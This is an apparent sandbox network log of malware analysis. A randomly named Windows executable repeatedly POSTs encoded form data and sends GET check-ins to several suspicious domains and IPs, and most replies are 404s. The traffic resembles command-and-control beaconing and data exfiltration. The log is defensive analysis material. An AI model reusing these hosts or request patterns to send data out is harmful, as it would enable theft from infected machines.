Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
Content-Encoding: gzip


Session ID: 14, Source IP: 192.168.2.5, Source Port: 49989, Destination IP: 183.181.83.131, Destination Port: 80, PID: 4568, Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp: Oct 8, 2024 15:38:58.526508093 CEST, Bytes transferred: 753, Direction: OUT
POST /ui3j/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.nakama2-sshl.xyz
Origin: http://www.nakama2-sshl.xyz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.nakama2-sshl.xyz/ui3j/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Ascii: nV=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2v0SCDTi3h4iwr1iUk6Bu+bC6GurGqgW4v9ejZMeXlY7eXB4XEWSpEaAMkQFkEUvYLnRP7ZBiRDDx1Cz+sQS4lFENHiVa6nYVLeFWsDT2XBJ11JRZan8fl2z365Pz3U/KRODaJZBTuTbOOyePv7q6VfvOzks4frlmDa47agM/aE1BpDXscW
Timestamp: Oct 8, 2024 15:38:59.366974115 CEST, Bytes transferred: 1236, Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:38:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
Content-Encoding: gzip


Session ID: 15, Source IP: 192.168.2.5, Source Port: 49990, Destination IP: 183.181.83.131, Destination Port: 80, PID: 4568, Process: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp: Oct 8, 2024 15:39:01.454221010 CEST, Bytes transferred: 1770, Direction: OUT
POST /ui3j/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.nakama2-sshl.xyz
Origin: http://www.nakama2-sshl.xyz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.nakama2-sshl.xyz/ui3j/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Timestamp: Oct 8, 2024 15:39:02.344259024 CEST, Bytes transferred: 1236, Direction: IN
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49991 | 183.181.83.131 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:03.989612103 CEST | 474 | OUT | GET /ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.nakama2-sshl.xyz
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:39:04.846374035 CEST | 478 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 08 Oct 2024 13:39:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49992 | 38.47.232.196 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:10.079406977 CEST | 712 | OUT | POST /ak5l/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.zz82x.top
Origin: http://www.zz82x.top
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.zz82x.top/ak5l/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=TFWyNNewSMoxA6MtZEu62WJnabjMo11qwH0/Wpi5tNpM5Zp91nMBbpwUkwgHwO6h89UNVrrtFnQBhN6txM4QX1mOyIQ81VIYtRHdoBZoZguMC9vFgEPPmgti9AT4x0E5OviyZOi/g+9ZI87BlZLKY2le/nKfFOfrozMQychutke+DWYErXisofeYHH19jo4tF75RRDo=
Oct 8, 2024 15:39:11.019114017 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:10 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49993 | 38.47.232.196 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:12.623302937 CEST | 732 | OUT | POST /ak5l/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.zz82x.top
Origin: http://www.zz82x.top
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.zz82x.top/ak5l/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uNM44Z9nWMBepwU9Agev+6q89YFVuTtFnUBhMKtx/gfUFmM7oR6xVIYtRHdoB9CZgGMCMfFyWnMqAtt4AT47kE9OvjVZLDYg81ZI8rBlM3JCmlYz3KLMOO+hREx4ugKwFifGg1ux1qE7/ygXU9KyYZEfYphPU8/KFT+3pBHIDfOA/QLMv1G
Oct 8, 2024 15:39:13.569960117 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:13 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49994 | 38.47.232.196 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:15.170475006 CEST | 1749 | OUT | POST /ak5l/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.zz82x.top
Origin: http://www.zz82x.top
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.zz82x.top/ak5l/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uFM4KB92F0BdpwUiwgDv+6789Q/VvvTFlcBuOCtzOgfDVmM2IQ91VIJtRXZoBtCZgGMCP3FxEPMsAti9AS5x0EVOvrvZLPigtVZIdbBm+fJJmlaw3LMMODuhVcD4vUkwCOfHkAYhF3c/+aHbkd5s4J1aJVaKDUjLWHx2ZEKNyq0bosLMpcBv3hmHmXXrg/Ly9LfmiF+drQgdIkfmwWwIG4zWP5556b51VfxBpoduEFY9W+XMMRoX74/YYg4nVadLm1HVI/OAdfao1cjLjLQC0imLguz1IGb/76Z9w/NG/K+09UTmFcfIUdyaIIM8VJrIUXkjYDKzNENLWM07/NY85FsLZjE2nXvU1LdXTfZoJYxKzWTB8gXqEebQMeHxL9wrhBBlfhvh4RYb7L0/ru9RHBGG6LpT6Vu6WnA3zAzQKcYMakHfznDXXEv4mhpb5WqqnwHUeWHCeD2TQyGaCqvR/P/6JjYRlY4cxjhepeGUQjGxnXjrxPU0EZ01pAz9nXnIdWmiJyl1b5u6YpqFkEwuay07/K4gfdZ0JI4bcp1h8QF9TItS7vU4/emDhoeArxLY2KsQ2/BTe8yq0vz5qhqpcPiK/7suO4a6M0bd85FN5dAZSwWN3ydTi6vE76XOj3qPzk/ukpXxyMIi7cC3Y64zTyoojI3Du2AQUeGaCgHCwjV7rgJ7wzOD5Qu2eTOI2p6an+dPRN/L2W24yu3LaabO0zp3pqAgrICYMx5r8IuP3+adcKRQ/SloYCsEcp6cJvcPqzls2/7MY91bl/Eb33y/HKn8l7s/KUq9UExLj5yLCQrPKZYCfLPitWrHyUXMu0V+hCGXkqE7N9Zoc0p9MJVjYuq1ZAv/gbpN0loM2Zm0WUtXbO/jKF1CIiLeCwIWm0uw1HqUyqp6qpZkDPdto3S1ZITWysAQAt2f7fZO+q8nOwQQonmIUpivFeUdzgu9Py3tfRfINmqF [TRUNCATED]
Oct 8, 2024 15:39:16.103693962 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:15 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49995 | 38.47.232.196 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:17.710258961 CEST | 467 | OUT | GET /ak5l/?ntHx=DVDDWR70P4Ux&nV=eH+SO6exUc8kNdksa1CSzQBVVc7aplBFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhL3O0xstuwQMp3nW6pA5kKg3bBdr252Da+1tCwmPlqiVqcw== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.zz82x.top
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:39:18.594732046 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:18 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49996 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:23.631701946 CEST | 721 | OUT | POST /b8ih/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.tukaari.shop
Origin: http://www.tukaari.shop
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.tukaari.shop/b8ih/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=DfbY9zoFUK0o3iw7/dcpefSou3q62VDeDM0J1Kvl3dGxqPKMaaL86k/QQc4f9jJuaDnF5AxevglrRvcVQnGU+jf3BO6IpX5WWQO+0/gr99ZppnKMAEzVNgONq3M7aPNtD6Ynaf1ZZ66MIpxEbzK7EBass4QmCJvlcLtKXHVrEHQ7o6WDLZb8eFW0bFlVeJZzEr7G4PQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49997 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:26.181380033 CEST | 741 | OUT | POST /b8ih/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.tukaari.shop
Origin: http://www.tukaari.shop
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.tukaari.shop/b8ih/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=DfbY9zoFUK0o3CA7wccpJvSnyHq651DaDL8J1O/13vixpu6MdbL8vk/Qb85b5jIiaD6l5B9evmJrRtEVRQ6V/zf1Y+6K0H5WWQO+0/0F99BpuX6MBlzSRQOC8HM7M/NhD6YJaepzZ4yMIs1EanW4dxauo4RDCpupQq9mLVhrYxgvtM7pR7TUNl6MLWtiP54aeIr2mYF0gaJTgUsKNELMPPmQzOnR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49998 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:28.729100943 CEST | 1758 | OUT | POST /b8ih/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.tukaari.shop
Origin: http://www.tukaari.shop
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.tukaari.shop/b8ih/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Ascii: nV= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49999 | 3.33.130.190 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:31.349512100 CEST | 470 | OUT | GET /b8ih/?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.tukaari.shop
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:39:34.810785055 CEST | 408 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 08 Oct 2024 13:39:34 GMT
Content-Type: text/html
Content-Length: 268
Connection: close
                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50000 | 154.212.219.2 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:40.275346994 CEST | 730 | OUT | POST /6wpo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.prj81oqde1.buzz
Origin: http://www.prj81oqde1.buzz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.prj81oqde1.buzz/6wpo/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=h/ionbQWjbvi0Uwiv89uhlMEtXOuYNvRBKmGLSEnNHvG+ax6QYvrT236BxeC3RmdeqBu2SDWNpepN+uFuQEzcBOxuHnY0WDQwzw9DIafsl6sFlMjBHmQawAC7mf9K8Aim8kPwxnZyBWLM0OEQX8xQe+/SyBMjiUtB6S8Onc32wZU8/u+DzZxOtPmPbWqjkceaIIvgyc=
Oct 8, 2024 15:39:41.167471886 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:41 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50001 | 154.212.219.2 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:42.835398912 CEST | 750 | OUT | POST /6wpo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.prj81oqde1.buzz
Origin: http://www.prj81oqde1.buzz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Referer: http://www.prj81oqde1.buzz/6wpo/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=h/ionbQWjbvi10Aiua1utVMLi3OuKNvdBKqGLX83Ky3G/6h6RaLrQ236KReD4xmDer8b2QXWNqipN82FvnYwdRO/innapGDQwzw9DIO5slSsFQEjAiKXGAAB+mf9O8Acm8lYw0O8yCuLM2GETG8yLO+1PiAoriZJDpu8ElZ92AhM5JDUZRRZdNjefIedyU93ArYf+lIyNHybKtGM8njyQW8LVjDX
Oct 8, 2024 15:39:43.739476919 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:43 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50002 | 154.212.219.2 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:45.384706974 CEST | 1767 | OUT | POST /6wpo/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.prj81oqde1.buzz
Origin: http://www.prj81oqde1.buzz
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Referer: http://www.prj81oqde1.buzz/6wpo/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Ascii: nV= [TRUNCATED]
Oct 8, 2024 15:39:46.306776047 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:46 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Oct 8, 2024 15:39:46.492176056 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:46 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50003 | 154.212.219.2 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:47.928237915 CEST | 473 | OUT | GET /6wpo/?nV=s9KIkrkzrqTbzkMlvbBfjAUuuxKvGdewBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAeSSUnznUnGrbhm47OZW7gX2VGBRmOyGjZmEPzG32fut7kA==&ntHx=DVDDWR70P4Ux HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.prj81oqde1.buzz
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:39:48.798584938 CEST | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:39:48 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50004 | 133.130.35.90 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:39:55.177587986 CEST | 718 | OUT | POST /p9u3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.komart.shop
Origin: http://www.komart.shop
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.komart.shop/p9u3/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Ascii: nV=O3h880Jaoet1EdJJRgtptXVsNjIr6bOg8M98GcuIhSzoOTKJIPkj06RmlF3TeaqbQBMmWVilkpx1UyMlcKFS/ewYqhjVAxnP8Bq+QiSxB9GsEVKgYV8v1K3UZPSTUWtc05qCRJtBA8gx5HJpN01AxweVCRu5jSKfkQdAU+G8i5VoYsKCg52vXdT/GAGaF8rXXR0AJS4=
                                                                                                                  Oct 8, 2024 15:39:55.957986116 CEST668INHTTP/1.1 404 Not Found
                                                                                                                  content-encoding: gzip
                                                                                                                  content-type: text/html
                                                                                                                  date: Tue, 08 Oct 2024 13:39:55 GMT
                                                                                                                  etag: W/"66fe0220-2b5"
                                                                                                                  server: nginx
                                                                                                                  vary: Accept-Encoding
                                                                                                                  content-length: 454
                                                                                                                  connection: close
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                                                                                                                  Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50005 | 133.130.35.90 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe

Timestamp | Bytes transferred | Direction | Data
